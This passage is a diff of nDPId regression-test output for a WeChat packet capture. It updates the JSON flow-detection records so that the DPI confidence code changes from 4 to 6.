00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1492167455891,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455891,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701iyhnqT53mM+KASN8htQwAAAgQFoAQCCApFraLqADEeEAEDAwc="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1492167455891,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167455891,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0kuhAAEAGglzAqAFny82XotNYAbvneYz4soZ6lIAQAOXShAAAAQEICgAxHmpFraLq"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167455528,"flow_last_seen":1492167455891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":648,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":650,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167455528,"flow_last_seen":1492167455891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":648,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":650,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167353687,"flow_last_seen":1492167354015,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
@@ -218,83 +218,83 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1492167617498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617498,"pkt":"8IQvSpdgeJKcD6iOCABFAAA82VRAAEAGO+jAqAFny82XotNgAbuDb2VoAAAAAKACchA2DwAAAgQFtAQCCAoAMbw8AAAAAAEDAwc="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1492167617560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617560,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701\/B3aGGedWdcKASN8hYRQAAAgQFoAQCCApFrkDUADG7\/gEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1492167617560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617560,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JpJAAEAG7rLAqAFny82XotNfAbt51Z1wwd2hh4AQAOW9kgAAAQEICgAxvExFrkDU"} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167617248,"flow_last_seen":1492167617561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167617561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167617248,"flow_last_seen":1492167617561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167617561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1492167617562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0KCxAACwGAHnLzZeiwKgBZwG7016qUxmsLakleYAQAJ8hsQAAAQEICkWuQNUAMbv9"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1492167617598,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617598,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0701AAC0GOFfLzZeiwKgBZwG7011ZGE0wTWdde4AQAOqB1AAAAQEICkXSpjoAMbv9"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1492167617850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617850,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Andsj9g29laaASN8iTkQAAAgQFoAQCCApF0qaCADG8PAEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1492167617850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617850,"pkt":"8IQvSpdgeJKcD6iOCABFAAA02VVAAEAGO+\/AqAFny82XotNgAbuDb2VpJ3bI\/oAQAOX41AAAAQEICgAxvJRF0qaC"} 
-00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":852,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167617248,"flow_last_seen":1492167617881,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167617881,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167617248,"flow_last_seen":1492167617883,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167617883,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":852,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167617248,"flow_last_seen":1492167617881,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167617881,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167617248,"flow_last_seen":1492167617883,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167617883,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167619048,"flow_last_seen":1492167619048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167619048,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1492167619048,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167619048,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Dr9AAEAGBobAqAFny82XotNaAbub+DW+SvgsEIARAOUtjAAAAQEICgAxvcBFrgFX"} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1492167353687,"flow_last_seen":1492167367265,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5826,"flow_tot_l4_payload_len":23865,"flow_avg_l4_payload_len":582,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167353937,"flow_last_seen":1492167367264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1492167355723,"flow_last_seen":1492167367264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167366908,"flow_last_seen":1492167378674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9774,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1492167353687,"flow_last_seen":1492167367265,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5826,"flow_tot_l4_payload_len":23865,"flow_avg_l4_payload_len":582,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167353937,"flow_last_seen":1492167367264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1492167355723,"flow_last_seen":1492167367264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167366908,"flow_last_seen":1492167378674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9774,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
